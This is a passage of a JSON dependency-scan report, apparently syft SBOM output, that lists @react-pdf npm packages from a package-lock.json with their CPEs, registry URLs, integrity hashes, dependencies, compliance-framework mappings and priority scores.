}, { "cpe": "cpe:2.3:a:\\@react-pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/image@2.3.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz", "integrity": "sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/png-js": "^2.3.1", "cross-fetch": "^3.1.5", "jay-peg": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "751c0bb9092b6d5a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/layout 3.13.0", "title": "@react-pdf/layout 3.13.0", "description": "Package discovered: @react-pdf/layout 3.13.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bfc90f0951098a84", "name": "@react-pdf/layout", "version": "3.13.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/layout@3.13.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz", "integrity": "sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/fns": "2.2.1", "@react-pdf/image": "^2.3.6", "@react-pdf/pdfkit": "^3.2.0", "@react-pdf/primitives": "^3.1.1", "@react-pdf/stylesheet": "^4.3.0", "@react-pdf/textkit": "^4.4.1", "@react-pdf/types": "^2.6.0", "cross-fetch": "^3.1.5", "emoji-regex": "^10.3.0", "queue": "^6.0.1", "yoga-layout": "^2.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "18357a3fbdd2a393", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/pdfkit 3.2.0", "title": "@react-pdf/pdfkit 3.2.0", "description": "Package discovered: @react-pdf/pdfkit 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3f225c34b86f8909", "name": "@react-pdf/pdfkit", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/pdfkit@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz", "integrity": "sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/png-js": "^2.3.1", "browserify-zlib": "^0.2.0", "crypto-js": "^4.2.0", "fontkit": "^2.0.2", "jay-peg": "^1.0.2", "vite-compatible-readable-stream": "^3.6.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a9e659420a7b937a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/pdfkit 5.1.1", "title": "@react-pdf/pdfkit 5.1.1", "description": "Package discovered: @react-pdf/pdfkit 5.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "24d45580f4c0f7bb", "name": "@react-pdf/pdfkit", "version": "5.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/pdfkit@5.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz", "integrity": "sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg==", "dependencies": { "@babel/runtime": "^7.20.13", "@noble/ciphers": "^1.0.0", "@noble/hashes": "^1.6.0", "browserify-zlib": "^0.2.0", "fontkit": "^2.0.2", "jay-peg": "^1.1.1", "js-md5": "^0.8.3", "linebreak": "^1.1.0", "png-js": "^2.0.0", "vite-compatible-readable-stream": "^3.6.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aadf20f14ed3a63a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/png-js 2.3.1", "title": "@react-pdf/png-js 2.3.1", "description": "Package discovered: @react-pdf/png-js 2.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ecd22ec88d1d110f", "name": "@react-pdf/png-js", "version": "2.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/png-js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/png-js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/png_js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/png_js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/png-js@2.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz", "integrity": "sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg==", "dependencies": { "browserify-zlib": "^0.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4f8cb527e021a217", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/primitives 3.1.1", "title": "@react-pdf/primitives 3.1.1", "description": "Package discovered: @react-pdf/primitives 3.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "18694a13e91dacfb", "name": "@react-pdf/primitives", "version": "3.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/primitives@3.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz", "integrity": "sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2743499890ec5e22", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/primitives 4.3.0", "title": "@react-pdf/primitives 4.3.0", "description": "Package discovered: @react-pdf/primitives 4.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "edf229ed71e6ba52", "name": "@react-pdf/primitives", "version": "4.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/primitives@4.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz", "integrity": "sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ea34747c8a1e8321", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/render 3.5.0", "title": "@react-pdf/render 3.5.0", "description": "Package discovered: @react-pdf/render 3.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3e1fba314601b9a8", "name": "@react-pdf/render", "version": "3.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/render@3.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz", "integrity": "sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/fns": "2.2.1", "@react-pdf/primitives": "^3.1.1", "@react-pdf/textkit": "^4.4.1", "@react-pdf/types": "^2.6.0", "abs-svg-path": "^0.1.1", "color-string": "^1.9.1", "normalize-svg-path": "^1.1.0", "parse-svg-path": "^0.1.2", "svg-arc-to-cubic-bezier": "^3.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and 